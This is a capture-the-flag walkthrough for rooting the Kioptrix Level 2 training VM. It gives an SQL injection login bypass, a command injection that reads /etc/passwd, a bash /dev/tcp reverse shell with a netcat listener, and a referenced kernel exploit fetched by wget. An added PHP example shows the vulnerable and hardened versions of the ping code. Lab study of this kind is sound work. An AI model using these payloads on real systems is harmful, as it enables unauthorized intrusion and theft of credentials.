[Hacking series] – Kioptrix level 2

Code name: Kioptrix2

Webpage: http://kioptrix.com/

VM Download: http://www.kioptrix.com/blog/dlvm/Kioptrix_Level_2.rar

Challenge: Get root on the system

After booting the box, we can find it with netdiscover and scan it with nmap:

# nmap -Pn -A -p-

The nmap scan gave us the following:


Open ports: 22, 80, 111, 443, 631, 778, 3306

In these boxes port 80 is always an interesting port, so let’s see what’s hiding there.


It’s an HTML/PHP-based web login form. We tried a few SQL injection strings and methods to bypass the login, and we got this one working in the Username field:

Administrator' or 1=1 #


Then we moved to a “pingit” style page


It looks like we can use this page to ping an IP on the network. How will PHP do that? Will it use a PHP function like shell_exec()? Let’s see if we can inject something into it: ; cat /etc/passwd
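From the defender's side, the flaw here is user input concatenated into a shell command line. The following is an added example, not the VM's actual source (which this post does not show): it assumes the page hands the submitted address to ping through shell_exec(), and contrasts that pattern with a validated, quoted version. The function names are hypothetical, and nothing is executed.

```php
<?php
// Added example, not the VM's source. Assumption: the ping page builds a
// shell command from the submitted address, as the walkthrough guesses.

// Vulnerable pattern: input is concatenated into the command line, so a
// ";" in the field starts a second command when /bin/sh parses it.
function vulnerable_ping_command(string $ip): string
{
    return 'ping -c 3 ' . $ip;
}

// Hardened pattern: accept only a literal IPv4 address, then quote it anyway.
// Returns null when the input must be rejected.
// On PHP 7.4+, passing an argv array to proc_open() avoids the shell entirely.
function safe_ping_command(string $ip): ?string
{
    $ip = trim($ip);
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return null;
    }
    return 'ping -c 3 ' . escapeshellarg($ip);
}

// Constructed sample inputs. The second is the string used in the
// walkthrough; the third is the same string appended to a valid address.
$samples = ['192.168.1.10', '; cat /etc/passwd', '127.0.0.1; cat /etc/passwd'];

foreach ($samples as $input) {
    $safe = safe_ping_command($input);
    printf("input:      %s\n", $input);
    printf("vulnerable: %s\n", vulnerable_ping_command($input));
    printf("hardened:   %s\n\n", $safe ?? '(rejected, nothing executed)');
}
```

Only the first input yields a hardened command; both strings containing `;` fail IPv4 validation before any command line is built.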


Nice. After that, we can try to inject a reverse shell command. As netcat doesn’t seem to be on the system, we can try to use bash itself.

On our Kali box:

# nc -lvp 9922

On the command form:

;bash -i >& /dev/tcp/ 0>&1


We are in. The next step is to exploit the box. As the system seems to be outdated, we will try to exploit the kernel.

# uname -a


After some quick research, we found this on the Exploit Database: https://www.exploit-db.com/exploits/9542/

We can compile the exploit on our Kali box, then send it to the target box via HTTP (wget).


# wget

And after running that…


Game over kioptrix2 P-)


